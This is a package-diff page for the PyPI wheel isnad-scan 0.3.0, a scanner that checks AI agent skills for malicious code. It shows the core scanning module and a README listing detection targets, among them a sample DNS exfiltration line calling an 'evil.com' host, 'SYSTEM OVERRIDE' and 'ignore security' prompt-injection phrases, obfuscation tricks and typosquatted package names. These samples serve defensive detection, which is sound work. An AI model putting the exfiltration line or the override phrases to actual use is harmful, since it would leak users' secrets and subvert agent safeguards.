PyPI - isnad-scan - Versions diffs - 0.3.0__py3-none-any.whl - Mend

isnad-scan 0.3.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (12) hide show

isnad_scan/__init__.py +2 -0
isnad_scan/ast_analyzer.py +374 -0
isnad_scan/binary_scanner.py +230 -0
isnad_scan/cli.py +221 -0
isnad_scan/cve_checker.py +238 -0
isnad_scan/js_analyzer.py +154 -0
isnad_scan/patterns.py +573 -0
isnad_scan/scanner.py +342 -0
isnad_scan-0.3.0.dist-info/METADATA +186 -0
isnad_scan-0.3.0.dist-info/RECORD +12 -0
isnad_scan-0.3.0.dist-info/WHEEL +4 -0
isnad_scan-0.3.0.dist-info/entry_points.txt +2 -0

isnad_scan/scanner.py ADDED Viewed

@@ -0,0 +1,342 @@
+"""Core scanning logic."""
+import hashlib
+import json
+import os
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Dict, List, Optional, Set
+from urllib.parse import urlparse
+from .patterns import Finding, Severity, scan_content, scan_dependencies
+from .ast_analyzer import analyze_python_ast, is_python_file
+from .cve_checker import check_dependencies_for_cves
+from .js_analyzer import analyze_javascript, is_javascript_file
+from .binary_scanner import scan_binary_file, is_binary_file, is_image_file, BINARY_EXTENSIONS, IMAGE_EXTENSIONS
+# File extensions to scan (text files)
+SCANNABLE_EXTENSIONS = {
+    '.py', '.js', '.ts', '.jsx', '.tsx', '.mjs', '.cjs',  # Code
+    '.sh', '.bash', '.zsh', '.fish',                       # Shell
+    '.md', '.markdown', '.txt', '.rst',                    # Docs
+    '.html', '.htm', '.xml',                               # Markup
+    '.yaml', '.yml', '.json', '.toml', '.ini', '.cfg',     # Config
+    '.env', '.env.example', '.env.local',                  # Environment
+}
+# Binary extensions handled separately
+BINARY_SCAN_EXTENSIONS = BINARY_EXTENSIONS | IMAGE_EXTENSIONS
+# Dependency files that need special scanning
+DEPENDENCY_FILES = {
+    'requirements.txt', 'requirements-dev.txt', 'requirements-test.txt',
+    'Pipfile', 'pyproject.toml', 'setup.py', 'setup.cfg',
+    'package.json', 'package-lock.json', 'yarn.lock',
+    'Gemfile', 'Gemfile.lock',
+    'go.mod', 'go.sum',
+    'Cargo.toml', 'Cargo.lock',
+}
+# Files to always scan regardless of extension
+ALWAYS_SCAN = {'SKILL.md', 'README.md', 'AGENTS.md', 'Dockerfile', 'Makefile'}
+# Directories to skip
+SKIP_DIRS = {
+    'node_modules', '__pycache__', '.git', 'venv', '.venv',
+    'dist', 'build', '.tox', '.pytest_cache', '.mypy_cache',
+    'egg-info', '.eggs', 'htmlcov', '.coverage',
+}
+# Max file size to scan (1MB)
+MAX_FILE_SIZE = 1024 * 1024
+@dataclass
+class ScanResult:
+    """Result of scanning a skill."""
+    path: str
+    findings: List[Finding] = field(default_factory=list)
+    files_scanned: int = 0
+    files_skipped: int = 0
+    errors: List[str] = field(default_factory=list)
+    warnings: List[str] = field(default_factory=list)
+    file_hashes: Dict[str, str] = field(default_factory=dict)
+    symlinks_found: List[str] = field(default_factory=list)
+    @property
+    def trust_level(self) -> str:
+        """Determine overall trust level based on findings."""
+        danger_count = sum(1 for f in self.findings if f.severity == Severity.DANGER)
+        warn_count = sum(1 for f in self.findings if f.severity == Severity.WARN)
+        if danger_count > 0:
+            return "DANGER"
+        elif warn_count > 3:
+            return "WARN"
+        elif warn_count > 0:
+            return "CAUTION"
+        elif self.symlinks_found:
+            return "CAUTION"  # Symlinks are suspicious
+        else:
+            return "SAFE"
+    @property
+    def exit_code(self) -> int:
+        """Exit code for CLI."""
+        level = self.trust_level
+        if level == "DANGER":
+            return 2
+        elif level in ("WARN", "CAUTION"):
+            return 1
+        else:
+            return 0
+    def summary(self) -> dict:
+        """Get summary statistics."""
+        return {
+            "trust_level": self.trust_level,
+            "files_scanned": self.files_scanned,
+            "files_skipped": self.files_skipped,
+            "findings": {
+                "danger": sum(1 for f in self.findings if f.severity == Severity.DANGER),
+                "warn": sum(1 for f in self.findings if f.severity == Severity.WARN),
+                "info": sum(1 for f in self.findings if f.severity == Severity.INFO),
+            },
+            "errors": len(self.errors),
+            "warnings": len(self.warnings),
+            "symlinks": len(self.symlinks_found),
+        }
+    @property
+    def content_hash(self) -> str:
+        """Get hash of all scanned content for caching."""
+        if not self.file_hashes:
+            return ""
+        combined = "|".join(f"{k}:{v}" for k, v in sorted(self.file_hashes.items()))
+        return hashlib.sha256(combined.encode()).hexdigest()[:16]
+def should_scan_file(path: Path) -> bool:
+    """Determine if a file should be scanned (text files)."""
+    if path.name in ALWAYS_SCAN:
+        return True
+    if path.name in DEPENDENCY_FILES:
+        return True
+    if path.suffix.lower() in SCANNABLE_EXTENSIONS:
+        return True
+    return False
+def should_scan_binary(path: Path) -> bool:
+    """Determine if a binary file should be scanned."""
+    return path.suffix.lower() in BINARY_SCAN_EXTENSIONS
+def is_dependency_file(path: Path) -> bool:
+    """Check if file is a dependency manifest."""
+    return path.name in DEPENDENCY_FILES
+def check_symlink_safety(path: Path, base_dir: Path) -> tuple[bool, Optional[str]]:
+    """
+    Check if a symlink is safe (resolves within the skill directory).
+    Returns (is_safe, error_message).
+    """
+    if not path.is_symlink():
+        return True, None
+    try:
+        resolved = path.resolve()
+        base_resolved = base_dir.resolve()
+        # Check if resolved path is within base directory
+        try:
+            resolved.relative_to(base_resolved)
+            return True, None
+        except ValueError:
+            return False, f"Symlink escapes skill directory: {path} -> {resolved}"
+    except Exception as e:
+        return False, f"Could not resolve symlink {path}: {e}"
+def hash_content(content: str) -> str:
+    """Hash content for caching."""
+    return hashlib.sha256(content.encode()).hexdigest()[:16]
+def scan_file(path: Path, base_dir: Path, check_cves: bool = False) -> tuple[List[Finding], Optional[str], Optional[str]]:
+    """
+    Scan a single file for security issues.
+    Returns (findings, error, content_hash).
+    """
+    try:
+        # Check file size
+        if path.stat().st_size > MAX_FILE_SIZE:
+            return [], f"File too large: {path}", None
+        # Read content
+        try:
+            content = path.read_text(encoding='utf-8')
+        except UnicodeDecodeError:
+            try:
+                content = path.read_text(encoding='latin-1')
+            except Exception:
+                return [], f"Could not decode: {path}", None
+        # Hash for caching
+        content_hash = hash_content(content)
+        # Scan content with regex patterns
+        findings = scan_content(content, str(path))
+        # AST analysis for Python files (catches evasion that regex misses)
+        if is_python_file(str(path)):
+            ast_findings = analyze_python_ast(content, str(path))
+            findings.extend(ast_findings)
+        # JavaScript analysis (including minified code handling)
+        if is_javascript_file(str(path)):
+            js_findings = analyze_javascript(content, str(path))
+            findings.extend(js_findings)
+        # Additional scanning for dependency files
+        if is_dependency_file(path):
+            dep_findings = scan_dependencies(content, str(path))
+            findings.extend(dep_findings)
+            # CVE checking (requires network)
+            if check_cves:
+                cve_findings = check_dependencies_for_cves(content, str(path))
+                findings.extend(cve_findings)
+        return findings, None, content_hash
+    except Exception as e:
+        return [], f"Error scanning {path}: {e}", None
+def scan_directory(path: Path, check_cves: bool = False) -> ScanResult:
+    """Scan a skill directory for security issues."""
+    result = ScanResult(path=str(path))
+    base_dir = path.resolve()
+    if not path.exists():
+        result.errors.append(f"Path does not exist: {path}")
+        return result
+    if not path.is_dir():
+        # Single file scan
+        if should_scan_file(path):
+            # Check symlink safety for single file
+            is_safe, symlink_error = check_symlink_safety(path, path.parent)
+            if not is_safe:
+                result.symlinks_found.append(str(path))
+                result.findings.append(Finding(
+                    severity=Severity.DANGER,
+                    pattern_id='unsafe_symlink',
+                    description=symlink_error or 'Symlink to external location',
+                    file=str(path),
+                    line=0,
+                    match=str(path),
+                ))
+            findings, error, content_hash = scan_file(path, path.parent, check_cves=check_cves)
+            result.findings.extend(findings)
+            result.files_scanned = 1
+            if content_hash:
+                result.file_hashes[str(path)] = content_hash
+            if error:
+                result.errors.append(error)
+        else:
+            result.files_skipped = 1
+        return result
+    # Track seen inodes to detect symlink loops
+    seen_inodes: Set[int] = set()
+    # Walk directory
+    for root, dirs, files in os.walk(path, followlinks=False):
+        root_path = Path(root)
+        # Skip hidden directories and common non-code dirs
+        dirs[:] = [d for d in dirs if not d.startswith('.') and d not in SKIP_DIRS]
+        # Check directory symlinks
+        for d in list(dirs):
+            dir_path = root_path / d
+            if dir_path.is_symlink():
+                is_safe, symlink_error = check_symlink_safety(dir_path, base_dir)
+                if not is_safe:
+                    result.symlinks_found.append(str(dir_path))
+                    result.findings.append(Finding(
+                        severity=Severity.DANGER,
+                        pattern_id='unsafe_symlink_dir',
+                        description=symlink_error or 'Directory symlink to external location',
+                        file=str(dir_path),
+                        line=0,
+                        match=str(dir_path),
+                    ))
+                    dirs.remove(d)  # Don't traverse unsafe symlinks
+        for filename in files:
+            filepath = root_path / filename
+            # Check for symlinks
+            if filepath.is_symlink():
+                is_safe, symlink_error = check_symlink_safety(filepath, base_dir)
+                if not is_safe:
+                    result.symlinks_found.append(str(filepath))
+                    result.findings.append(Finding(
+                        severity=Severity.DANGER,
+                        pattern_id='unsafe_symlink',
+                        description=symlink_error or 'Symlink to external location',
+                        file=str(filepath),
+                        line=0,
+                        match=str(filepath),
+                    ))
+                    continue
+            # Check for inode loops
+            try:
+                inode = filepath.stat().st_ino
+                if inode in seen_inodes:
+                    result.warnings.append(f"Duplicate inode (possible hard link): {filepath}")
+                    continue
+                seen_inodes.add(inode)
+            except Exception:
+                pass
+            if should_scan_file(filepath):
+                findings, error, content_hash = scan_file(filepath, base_dir, check_cves=check_cves)
+                result.findings.extend(findings)
+                result.files_scanned += 1
+                if content_hash:
+                    result.file_hashes[str(filepath)] = content_hash
+                if error:
+                    result.errors.append(error)
+            elif should_scan_binary(filepath):
+                # Scan binary files (pyc, images, etc.)
+                bin_findings, bin_error = scan_binary_file(filepath)
+                result.findings.extend(bin_findings)
+                result.files_scanned += 1
+                if bin_error:
+                    result.errors.append(bin_error)
+            else:
+                result.files_skipped += 1
+    return result
+def scan_skill(path_or_url: str, check_cves: bool = False) -> ScanResult:
+    """Main entry point: scan a skill from path or URL."""
+    # Check if it's a URL
+    parsed = urlparse(path_or_url)
+    if parsed.scheme in ('http', 'https'):
+        # TODO: Download and scan
+        result = ScanResult(path=path_or_url)
+        result.errors.append("URL scanning not yet implemented - download the skill first")
+        return result
+    # Local path
+    path = Path(path_or_url).resolve()
+    return scan_directory(path, check_cves=check_cves)

isnad_scan-0.3.0.dist-info/METADATA ADDED Viewed

@@ -0,0 +1,186 @@
+Metadata-Version: 2.4
+Name: isnad-scan
+Version: 0.3.0
+Summary: Security scanner for AI agent skills - detects code injection, prompt injection, credential exfiltration, and supply chain attacks
+Project-URL: Homepage, https://isnad.md
+Project-URL: Documentation, https://isnad.md/docs
+Project-URL: Repository, https://github.com/counterspec/isnad
+Project-URL: Issues, https://github.com/counterspec/isnad/issues
+Author-email: ISNAD Protocol <rapi@base64.amsterdam>
+License: MIT
+Keywords: agents,ai,cve,scanner,security,skills,vulnerability
+Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Operating System :: OS Independent
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Classifier: Topic :: Security
+Classifier: Topic :: Software Development :: Quality Assurance
+Requires-Python: >=3.11
+Requires-Dist: click>=8.0
+Requires-Dist: pyyaml>=6.0
+Requires-Dist: rich>=13.0
+Description-Content-Type: text/markdown
+# ISNAD Skill Scanner
+Security scanner for AI agent skills. Detects code injection, prompt injection, credential exfiltration, evasion techniques, and malicious dependencies.
+**Version:** 0.2.0
+**Patterns:** 69 (45 DANGER, 20 WARN, 4 INFO)
+## Installation
+```bash
+cd isnad/scanner
+uv pip install -e .
+```
+Or run directly:
+```bash
+uv run python -m isnad_scan.cli <path>
+```
+## Usage
+```bash
+# Scan a skill directory
+isnad-scan ./skills/some-skill/
+# JSON output (for CI/programmatic use)
+isnad-scan ./skill --json
+# Verbose (include INFO-level findings)
+isnad-scan ./skill --verbose
+# Show content hash (for caching/comparison)
+isnad-scan ./skill --hash
+# Quiet mode (just trust level)
+isnad-scan ./skill --quiet
+```
+## Exit Codes
+| Code | Meaning |
+|------|---------|
+| 0 | SAFE - no issues found |
+| 1 | CAUTION/WARN - review recommended |
+| 2 | DANGER - security issues detected |
+| 3 | ERROR - scanner error |
+## What It Detects
+### DANGER (45 patterns)
+**Code Execution:**
+- `eval()`, `exec()`, `compile()` usage
+- `getattr(__builtins__, 'eval')` evasion
+- String concatenation building dangerous calls (`"ev"+"al"`)
+- `chr()` concatenation obfuscation
+- `new Function()` in JavaScript
+- Lambda with dangerous functions
+**Shell Injection:**
+- `subprocess` with `shell=True`
+- `os.system()`, `os.popen()`
+- `child_process.exec()` in Node.js
+- Backtick command substitution
+**Prompt Injection:**
+- Hidden instructions in HTML comments
+- "SYSTEM OVERRIDE" / "ignore security" patterns
+- Instructions to suppress reporting
+**Data Exfiltration:**
+- Credential variables sent to network
+- DNS exfiltration (`socket.gethostbyname(secret + ".evil.com")`)
+- Tor hidden service URLs
+**Obfuscation:**
+- Base64 decoding, ROT13, hex strings
+- `bytes.fromhex()`, Unicode escapes
+- Unicode homoglyph evasion (ℯval vs eval)
+**Path Traversal & Symlinks:**
+- `../../` patterns in code
+- Symlinks escaping skill directory
+**Dangerous Deserialization:**
+- `pickle.load()`, `marshal.load()`
+- Unsafe YAML loading
+**Dependency Attacks:**
+- Typosquatted packages (reqeusts, crytpography, etc.)
+- Suspicious git dependencies
+- Known malicious package names
+### WARN (20 patterns)
+- Network requests (verify destinations)
+- File write/delete operations
+- Environment variable access
+- Dynamic imports
+- Crypto library usage
+### INFO (4 patterns)
+- Subprocess with list args
+- File reads
+- Logging statements
+## Context Awareness
+The scanner is context-aware:
+- Patterns in **documentation** (markdown, comments explaining attacks) are downgraded to INFO
+- Patterns in **code blocks** within markdown are handled appropriately
+- **String literals** containing pattern names (e.g., dict keys) don't trigger false positives
+## Example
+```
+$ isnad-scan ./evasion-skill/
+╭─── ISNAD Scan: ./evasion-skill ───╮
+│ Trust Level: 🚨 DANGER            │
+╰───────────────────────────────────╯
+📁 Files scanned: 3
+🚨 DANGER findings: 18
+[DANGER] evasion.py:10 — getattr_dangerous
+    Dynamic access to dangerous function via getattr
+[DANGER] evasion.py:5 — string_concat_evasion
+    String concatenation building eval/exec - evasion attempt
+[DANGER] SKILL.md:5 — prompt_injection_html
+    Potential prompt injection - attempts to override security
+[DANGER] requirements.txt:6 — dangerous_package
+    Potentially dangerous or typosquatted package: reqeusts
+```
+## Limitations
+What the scanner **cannot** catch (yet):
+- AST-level evasion (import aliasing, nested dynamic calls)
+- Minified/bundled JavaScript
+- Binary files with embedded scripts
+- Packages with known CVEs (needs OSV integration)
+- Actual malicious intent vs. legitimate security tools
+## Roadmap
+- [x] Pattern-based scanning (69 patterns)
+- [x] Dependency scanning (typosquats, suspicious sources)
+- [x] Symlink safety checks
+- [x] Context awareness (docs vs code)
+- [x] Prompt injection detection
+- [ ] AST parsing for Python/JS
+- [ ] CVE database integration (OSV/Snyk)
+- [ ] URL scanning (download remote skills)
+- [ ] ISNAD Registry integration (inscribe attestations)
+- [ ] ClawHub pre-install hook

isnad_scan-0.3.0.dist-info/RECORD ADDED Viewed

@@ -0,0 +1,12 @@
+isnad_scan/__init__.py,sha256=cVH3AVOQHwKu6_4AqNPbwLLcOS8JaPoKFFICmmzG9iA,88
+isnad_scan/ast_analyzer.py,sha256=nE49V8UKcDtL0qYj-36dz3PAoH8UQ2RVGD9mzNT4hjw,15446
+isnad_scan/binary_scanner.py,sha256=zb8X7pfAej54uxq8K_xYvGew6ENJjcB40TOWlVb92r0,8276
+isnad_scan/cli.py,sha256=RfgKnP2tpF_ud8XrY9cH3tKY6G-gh49s7lVNljXQWbE,7475
+isnad_scan/cve_checker.py,sha256=SLElHRrQV7Q9-d9-RgDdGcUSrD8KLojFVOb5ZRkRnWU,8333
+isnad_scan/js_analyzer.py,sha256=9_z9l30AMPGm9KQKjwXNv0Ic8g4Y3zS3AtY1R0VhH2A,6967
+isnad_scan/patterns.py,sha256=E_tJzPBVb1R0hKeNzjqvqkILdH_G02md8iK0hxU-IXM,21090
+isnad_scan/scanner.py,sha256=eELhXdDgsWuJqTfwVMbUrnplKCAdj-jenDRPsx0b5bQ,12563
+isnad_scan-0.3.0.dist-info/METADATA,sha256=IlN-51e5Kcyfy4UTTI3c0IH-5Z0FITI2ec7XeVIZmqw,5332
+isnad_scan-0.3.0.dist-info/WHEEL,sha256=WLgqFyCfm_KASv4WHyYy0P3pM_m7J5L9k2skdKLirC8,87
+isnad_scan-0.3.0.dist-info/entry_points.txt,sha256=XzQEtAu7l_PAGfpehU4ZFiqybOfrKrFqkWzCNvC6_SY,51
+isnad_scan-0.3.0.dist-info/RECORD,,

isnad_scan-0.3.0.dist-info/WHEEL ADDED Viewed

@@ -0,0 +1,4 @@
+Wheel-Version: 1.0
+Generator: hatchling 1.28.0
+Root-Is-Purelib: true
+Tag: py3-none-any

isnad_scan-0.3.0.dist-info/entry_points.txt ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ [console_scripts]
2	+ isnad-scan = isnad_scan.cli:main